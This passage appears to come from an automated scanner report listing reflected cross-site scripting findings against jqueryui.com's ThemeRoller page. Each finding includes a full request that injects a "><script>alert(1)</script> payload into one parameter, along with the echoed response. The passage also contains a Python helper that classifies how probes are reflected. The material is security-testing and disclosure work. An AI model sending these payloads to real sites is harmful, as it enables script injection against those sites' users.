GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png80133"><script>alert(1)</script>785ff6f694b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png80133"><script>alert(1)</script>785ff6f694b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

3.158. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbe4"><script>alert(1)</script>0b3844709c3 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png6cbe4"><script>alert(1)</script>0b3844709c3&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
"/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png6cbe4"><script>alert(1)</script>0b3844709c3&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcConte
...[SNIP]...

3.159. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1deb"><script>alert(1)</script>8320d1e8237 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngc1deb"><script>alert(1)</script>8320d1e8237&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
7bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngc1deb"><script>alert(1)</script>8320d1e8237&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

3.160. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91f47"><script>alert(1)</script>86f6ab1337a was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png91f47"><script>alert(1)</script>86f6ab1337a&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png91f47"><script>alert(1)</script>86f6ab1337a&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636
...[SNIP]...
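The "Issue detail" for each of these findings rests on a single check: the probe string came back byte-for-byte, and it landed inside a double-quoted attribute value, so the probe's own double quote is what lets it leave the attribute. The Python below is an added example (it is not part of this report and not jqueryui.com code) of reproducing that classification over a saved response body: it tells a raw reflection from an entity-encoded one, works out the markup context of the match, and decides whether the probe can break out. The response fragment in it is constructed to mirror the reflection this report shows later for the cornerRadius parameter; it is not a captured response.

```python
import html
from dataclasses import dataclass

# Constructed response fragment modelled on the reflection the report shows for
# the cornerRadius parameter (a stylesheet <link> whose href carries the whole
# ThemeRoller query string). It is not a captured response.
PROBE = 'bb0c1"><script>alert(1)</script>2173eee1a85'
SAMPLE_BODY = (
    '<!DOCTYPE html>\n<html>\n<head>\n'
    '<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?'
    'ctl=themeroller&cornerRadius=5px' + PROBE + '&bgColorHeader=66B2E6" '
    'type="text/css" media="all" />\n'
    '</head>\n<body></body>\n</html>\n'
)
# The same page with the probe entity-encoded, as a fixed server would emit it.
FIXED_BODY = SAMPLE_BODY.replace(PROBE, html.escape(PROBE, quote=True))


@dataclass
class Reflection:
    kind: str      # "raw", "encoded" or "absent"
    offset: int    # index of the match in the body, -1 when absent
    context: str   # "attribute-dquote", "attribute-squote", "tag", "text" or ""


def _context_at(body: str, idx: int) -> str:
    """Locate idx in the markup. Heuristic, not an HTML parser: if the nearest
    '<' before idx has no '>' after it we are inside a tag, and an odd number
    of quotes since that '<' puts us inside a quoted attribute value."""
    lt = body.rfind("<", 0, idx)
    gt = body.rfind(">", 0, idx)
    if lt == -1 or gt > lt:
        return "text"
    tag_prefix = body[lt:idx]
    if tag_prefix.count('"') % 2 == 1:
        return "attribute-dquote"
    if tag_prefix.count("'") % 2 == 1:
        return "attribute-squote"
    return "tag"


def classify_reflection(body: str, probe: str) -> Reflection:
    """Report whether probe came back verbatim, entity-encoded, or not at all."""
    idx = body.find(probe)
    if idx != -1:
        return Reflection("raw", idx, _context_at(body, idx))
    idx = body.find(html.escape(probe, quote=True))
    if idx != -1:
        return Reflection("encoded", idx, _context_at(body, idx))
    return Reflection("absent", -1, "")


def breaks_out(body: str, probe: str) -> bool:
    """True when a raw reflection lets the probe escape its syntactic context:
    it carries the matching quote inside a quoted attribute, or it is already
    sitting in tag or text context where no quote is needed."""
    r = classify_reflection(body, probe)
    if r.kind != "raw":
        return False
    if r.context == "attribute-dquote":
        return '"' in probe
    if r.context == "attribute-squote":
        return "'" in probe
    return True


if __name__ == "__main__":
    print(classify_reflection(SAMPLE_BODY, PROBE), breaks_out(SAMPLE_BODY, PROBE))
    print(classify_reflection(FIXED_BODY, PROBE), breaks_out(FIXED_BODY, PROBE))
```

The context heuristic is deliberately the same coarse test a scanner applies; it is enough to triage a probe that the server reflects verbatim, but a reflection inside a script block or an event-handler attribute needs the surrounding JavaScript context judged separately.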

3.161. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4c61"><script>alert(1)</script>2558bcf702b was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngf4c61"><script>alert(1)</script>2558bcf702b&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngf4c61"><script>alert(1)</script>2558bcf702b&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

3.162. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks; the response shows that attribute terminating in " type="text/css" media="all" />, i.e. the href of a stylesheet link. The payload fa1ed"><script>alert(1)</script>af92b1064b8 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngfa1ed"><script>alert(1)</script>af92b1064b8&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngfa1ed"><script>alert(1)</script>af92b1064b8&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.163. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64a53"><script>alert(1)</script>2590027d388 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e64a53"><script>alert(1)</script>2590027d388&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
5_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e64a53"><script>alert(1)</script>2590027d388&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorE
...[SNIP]...

3.164. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31e5e"><script>alert(1)</script>15d613d40d8 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc31e5e"><script>alert(1)</script>15d613d40d8&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc31e5e"><script>alert(1)</script>15d613d40d8&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover
...[SNIP]...

3.165. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 717a0"><script>alert(1)</script>8ae54f49d58 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba717a0"><script>alert(1)</script>8ae54f49d58&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=a